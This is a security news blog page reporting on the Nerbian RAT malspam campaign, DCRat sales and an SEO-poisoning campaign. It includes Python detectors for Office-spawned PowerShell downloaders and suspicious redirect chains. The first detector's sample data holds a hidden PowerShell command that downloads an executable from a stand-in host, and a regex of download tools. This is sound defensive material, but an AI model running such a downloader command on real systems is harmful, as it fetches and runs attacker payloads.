May 13 2022

New Nerbian RAT spreads via malspam campaigns using COVID-19

Category: Malware
DISC @ 8:41 am

Researchers spotted a new remote access trojan, named Nerbian RAT, which implements sophisticated evasion and anti-analysis techniques.

Researchers from Proofpoint discovered a new remote access trojan called Nerbian RAT that implements sophisticated anti-analysis and anti-reversing capabilities.

The malware spreads via malspam campaigns using COVID-19 and World Health Organization (WHO) themes. The RAT takes its name from a named function in the malware's source code; Nerbia is a fictional place in the novel Don Quixote.


The Nerbian RAT is written in the Go programming language, a choice that makes it straightforward to build for multiple platforms, and is compiled for 64-bit systems.

The malspam campaign spotted by Proofpoint started on April 26 and targeted multiple industries.

“Starting on April 26, 2022, Proofpoint researchers observed a low volume (less than 100 messages) email-borne malware campaign sent to multiple industries. The threat disproportionately impacts entities in Italy, Spain, and the United Kingdom.” reads the analysis published by Proofpoint. “The emails claimed to be representing the World Health Organization (WHO) with important information regarding COVID-19.”

The emails carry a weaponized Word attachment, sometimes compressed in a RAR archive. Once macros are enabled, the document displays decoy information about COVID-19 safety, specifically self-isolation measures for infected individuals.

The document contains logos from the Health Service Executive (HSE), Government of Ireland, and National Council for the Blind of Ireland (NCBI).

Once the document is opened and the macro enabled, a .bat file runs a PowerShell command that acts as a downloader for a 64-bit Golang dropper named “UpdateUAV.exe”.

The UpdateUAV executable is a dropper for the Nerbian RAT and borrows code from various GitHub projects.
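The infection chain above (Word macro, then a .bat file, then a PowerShell downloader) is what an endpoint detection rule would key on. The following is an added example for this page, not Proofpoint's code and not a sample from the campaign: it walks parent-process links in constructed Sysmon-style process-creation events and alerts on any PowerShell download command that descends from an Office application, noting whether cmd.exe ran a .bat in between. It generalizes beyond the page's single chain to any Office-to-PowerShell ancestry within a bounded depth. All PIDs, paths and the download URL in the sample are invented, and the download-cmdlet list and depth limit are assumptions.

```python
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
MAX_DEPTH = 5  # how many parent links to walk looking for the Office process (assumption)

# Cmdlets and classes commonly used to fetch a second stage from the network (assumed list).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
    r"start-bitstransfer|net\.webclient|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)

# Constructed sample in the shape of Sysmon Event ID 1 fields (JSON lines).
# PIDs, paths and the URL are invented for the example.
SAMPLE_EVENTS = r"""
{"ProcessId": 4000, "ParentProcessId": 800, "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"}
{"ProcessId": 4100, "ParentProcessId": 4000, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "\"WINWORD.EXE\" /n \"C:\\Users\\u\\Downloads\\WHO_COVID19_guidance.doc\""}
{"ProcessId": 4200, "ParentProcessId": 4100, "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\run.bat"}
{"ProcessId": 4300, "ParentProcessId": 4200, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/UpdateUAV.exe','C:\\Users\\u\\AppData\\Local\\Temp\\UpdateUAV.exe')\""}
{"ProcessId": 5000, "ParentProcessId": 4000, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"}
{"ProcessId": 5100, "ParentProcessId": 4000, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe Invoke-WebRequest https://updates.example.invalid/agent.msi -OutFile C:\\Temp\\agent.msi"}
"""


def parse_events(text):
    """Parse JSON-lines process-creation events into a list of dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def image_name(path):
    """Lower-cased basename of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(event, by_pid, max_depth=MAX_DEPTH):
    """Walk ParentProcessId links upward, nearest parent first.
    Caveat: PIDs are reused, so a production rule should key on
    ProcessGuid/ParentProcessGuid and a time window instead."""
    chain = [event]
    cur = event
    for _ in range(max_depth):
        cur = by_pid.get(cur["ParentProcessId"])
        if cur is None:
            break
        chain.append(cur)
    return chain


def find_office_download_chains(events):
    """Return one alert per PowerShell download command whose ancestry
    contains an Office application; via_batch records whether cmd.exe
    ran a .bat between the two, as in the chain described on the page."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        if image_name(e["Image"]) not in POWERSHELL:
            continue
        if not DOWNLOAD_RE.search(e["CommandLine"]):
            continue
        chain = ancestry(e, by_pid)
        office = next((a for a in chain[1:]
                       if image_name(a["Image"]) in OFFICE_APPS), None)
        if office is None:
            continue
        between = chain[1:chain.index(office)]
        via_batch = any(image_name(a["Image"]) == "cmd.exe"
                        and ".bat" in a["CommandLine"].lower() for a in between)
        alerts.append({
            "powershell_pid": e["ProcessId"],
            "office_pid": office["ProcessId"],
            "via_batch": via_batch,
            "chain": " -> ".join(image_name(a["Image"])
                                 for a in reversed(chain[:chain.index(office) + 1])),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_office_download_chains(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Of the three PowerShell launches in the sample, only the one descended from WINWORD.EXE through cmd.exe is reported; the scripted inventory run and the explorer-launched Invoke-WebRequest are left alone. The rule deliberately matches on ancestry rather than on the .bat step alone, since the same downloader pattern is just as suspicious when a macro spawns PowerShell directly.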

The Nerbian RAT supports a variety of functions, such as logging keystrokes and capturing screenshots, and handles its communications over SSL.

“Proofpoint assesses with high confidence that the dropper and RAT were both created by the same entity, and while the dropper may be modified to deliver different payloads in the future, the dropper is statically configured to download and establish persistence for this specific payload at the time of analysis.” concludes the report, which also includes indicators of compromise (IoCs).

malspam – spam email that delivers malware


👇 Please Follow our LI page…


DISC InfoSec

#InfoSecTools and #InfoSectraining

#InfoSecLatestTitles

#InfoSecServices

Tags: COVID-19, malspam attack, remote access trojan (RAT)


May 10 2022

DCRat, only $5 for a fully working remote access trojan

Category: Access Control, Remote code
DISC @ 8:21 am

Researchers warn of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums.

Cybersecurity researchers from BlackBerry are warning of a remote access trojan called DCRat (aka DarkCrystal RAT) that is available for sale on Russian cybercrime forums. The DCRat backdoor is very cheap and appears to be the work of a lone threat actor who goes online under the monikers “boldenis44,” “crystalcoder,” and Кодер (“Coder”). Prices for the backdoor start at 500 RUB ($5) for a two-month license, 2,200 RUB ($21) for a year, and 4,200 RUB ($40) for a lifetime subscription.

“Sold predominantly on Russian underground forums, DCRat is one of the cheapest commercial RATs we’ve ever come across. The price for this backdoor starts at 500 RUB (less than 5 GBP/US$6) for a two-month subscription, and occasionally dips even lower during special promotions. No wonder it’s so popular with professional threat actors as well as script kiddies.” reads the report published by BlackBerry.

The author has implemented an effective piece of malware and continues to maintain it efficiently. The researchers pointed out that its price is a fraction of the going rate for a RAT of this kind on Russian underground forums.

DCRat first appeared in the threat landscape in 2018; a year later it was redesigned and relaunched.

DCRat is written in .NET and has a modular structure; affiliates can develop their own plugins using a dedicated integrated development environment (IDE) called DCRat Studio.

The modular architecture allows the malware's functionality to be extended for multiple malicious purposes, including surveillance, reconnaissance, information theft, DDoS attacks, and arbitrary code execution.

The DCRat consists of three components:

  • A stealer/client executable
  • A single PHP page, serving as the command-and-control (C2) endpoint/interface
  • An administrator tool

“All DCRat marketing and sales operations are done through the popular Russian hacking forum lolz.guru, which also handles some of the DCRat pre-sales queries. DCRat support topics are made available here to the wider public, while the main DCRat offering thread is restricted to registered users only.” continues the report.

The malware is under active development; the author announces news and updates through a dedicated Telegram channel with approximately 3,000 subscribers.

DCRat Telegram announcing discounts and price specials (source BlackBerry)

In recent months, the researchers often observed DCRat clients being deployed with the use of Cobalt Strike beacons through the Prometheus TDS (traffic direction system).

DCRat also implements a kill switch that would render all instances of the DCRat administrator tool unusable, irrespective of subscriber license validity.

The administrator tool allows subscribers to sign in to an active C2 server, configure and generate builds of the DCRat client executable, and execute commands on infected systems.

The experts concluded that the RAT is maintained daily, which suggests the author is working on this project full-time.

“There are certainly programming choices in this threat that point to this being a novice malware author who hasn’t yet figured out an appropriate pricing structure. Choosing to program the threat in JPHP and adding a bizarrely non-functional infection counter certainly point in this direction. It could be that this threat is from an author trying to gain notoriety, doing the best with the knowledge they have to make something popular as quickly as possible.” concludes the report that also includes Indicators of Compromise (IoCs). “While the author’s apparent inexperience might make this malicious tool seem less appealing, some could view it as an opportunity. More experienced threat actors might see this inexperience as a selling point, as the author seems to be putting in a lot of time and effort to please their customers.”


Tags: RAT, remote access trojan, remote access trojan (RAT)


Jun 14 2021

SEO poisoning campaign aims at delivering RAT, Microsoft warns

Category: Trojan
DISC @ 1:04 pm

Microsoft spotted a series of attacks that use SEO poisoning to deliver a remote access trojan (RAT) used by threat actors to steal sensitive data.

Microsoft is monitoring a wave of cyber attacks that leverages SEO poisoning to deliver a remote access trojan (RAT) that steals sensitive data from infected systems.

The IT giant noted that the SEO poisoning technique is effective: Microsoft Defender Antivirus has detected thousands of PDF documents delivered as part of the ongoing campaign.

Upon opening the PDF files, users are prompted to download a .doc file or a .pdf version of the information they were searching for. Once the links are clicked, users are redirected through 5 to 7 sites with TLDs like .site, .tk, and .ga. These sites appear as clones of Google Drive web pages and are used to serve the SolarMarker malware.
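The redirect chain described above, several hops through throw-away TLDs before a lookalike landing page, is visible in proxy logs even when the final payload is not. The following is an added example for this page, not Microsoft's code or detection logic: it reconstructs per-client redirect chains from constructed proxy log lines by following each 3xx Location to the same client's next request for that URL, then flags chains that are both long and pass through several hosts on such TLDs. The log format, every host in the sample, the hop threshold and the TLDs other than .site, .tk and .ga are assumptions.

```python
import re
from urllib.parse import urlparse

# .site, .tk and .ga are the TLDs the campaign description names; the rest
# are assumed additions of the same free or low-cost kind.
SUSPICIOUS_TLDS = {"site", "tk", "ga", "ml", "cf", "gq"}
MIN_HOPS = 5        # campaign used 5 to 7 redirects; threshold is an assumption
MIN_BAD_HOSTS = 2   # require at least two throw-away hosts in the chain (assumption)

# Constructed log format: timestamp client method url status location ("-" if none)
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<location>\S+)$"
)

# Constructed sample: one poisoned-search victim (10.0.0.5) with an unrelated
# request interleaved, and one benign http-to-https redirect (10.0.0.7).
SAMPLE_LOG = """
2021-06-14T12:00:01Z 10.0.0.5 GET https://files-host.example.invalid/template.pdf 200 -
2021-06-14T12:00:09Z 10.0.0.5 GET https://files-host.example.invalid/download?doc=1 302 https://a1-files.site/r
2021-06-14T12:00:10Z 10.0.0.5 GET https://a1-files.site/r 302 https://b2-docs.tk/r
2021-06-14T12:00:10Z 10.0.0.5 GET https://b2-docs.tk/r 302 https://c3-share.ga/r
2021-06-14T12:00:11Z 10.0.0.5 GET https://c3-share.ga/r 302 https://d4-drive.site/r
2021-06-14T12:00:11Z 10.0.0.5 GET https://fonts.example.invalid/ui.css 200 -
2021-06-14T12:00:12Z 10.0.0.5 GET https://d4-drive.site/r 302 https://e5-drive.tk/open
2021-06-14T12:00:12Z 10.0.0.5 GET https://e5-drive.tk/open 200 -
2021-06-14T12:05:00Z 10.0.0.7 GET http://www.example.invalid/ 301 https://www.example.invalid/
2021-06-14T12:05:01Z 10.0.0.7 GET https://www.example.invalid/ 200 -
"""


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            entries.append(m.groupdict())
    return entries


def is_redirect(entry):
    return entry["status"].startswith("3") and entry["location"] != "-"


def tld(url):
    host = urlparse(url).hostname or ""
    return host.rsplit(".", 1)[-1].lower()


def redirect_chains(entries):
    """Follow each 3xx Location to the same client's next request for that URL,
    skipping unrelated requests in between. A chain is the list of URLs from the
    first redirecting request to the final landing page."""
    by_client = {}
    for e in entries:
        by_client.setdefault(e["client"], []).append(e)
    chains = []
    for client, evs in by_client.items():
        i = 0
        while i < len(evs):
            if not is_redirect(evs[i]):
                i += 1
                continue
            chain = [evs[i]["url"]]
            target = evs[i]["location"]
            last = i
            while True:
                nxt = next((k for k in range(last + 1, len(evs))
                            if evs[k]["url"] == target), None)
                if nxt is None:
                    break
                chain.append(evs[nxt]["url"])
                last = nxt
                if not is_redirect(evs[nxt]):
                    break
                target = evs[nxt]["location"]
            chains.append({"client": client, "urls": chain})
            i = last + 1
    return chains


def suspicious_chains(entries, min_hops=MIN_HOPS, min_bad_hosts=MIN_BAD_HOSTS):
    """Flag chains that are long and pass through several throw-away TLD hosts."""
    flagged = []
    for c in redirect_chains(entries):
        hops = len(c["urls"]) - 1
        bad_urls = [u for u in c["urls"] if tld(u) in SUSPICIOUS_TLDS]
        bad_hosts = {urlparse(u).hostname for u in bad_urls}
        if hops >= min_hops and len(bad_hosts) >= min_bad_hosts:
            c.update(hops=hops, suspicious_tlds=sorted({tld(u) for u in bad_urls}))
            flagged.append(c)
    return flagged


if __name__ == "__main__":
    for c in suspicious_chains(parse_log(SAMPLE_LOG)):
        print(c["client"], c["hops"], "hops:", " -> ".join(c["urls"]))
```

Requiring both a long chain and several throw-away hosts keeps ordinary http-to-https or CDN redirects out of the alert, while still catching the pattern even if the redirectors change domains from one victim to the next. The chain reconstruction stops at the first non-redirect response, so the last URL in a flagged chain is the landing page worth pulling for review.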

Microsoft experts noted that the PDF files are primarily hosted on Amazon Web Services and Strikingly.


Tags: remote access trojan (RAT)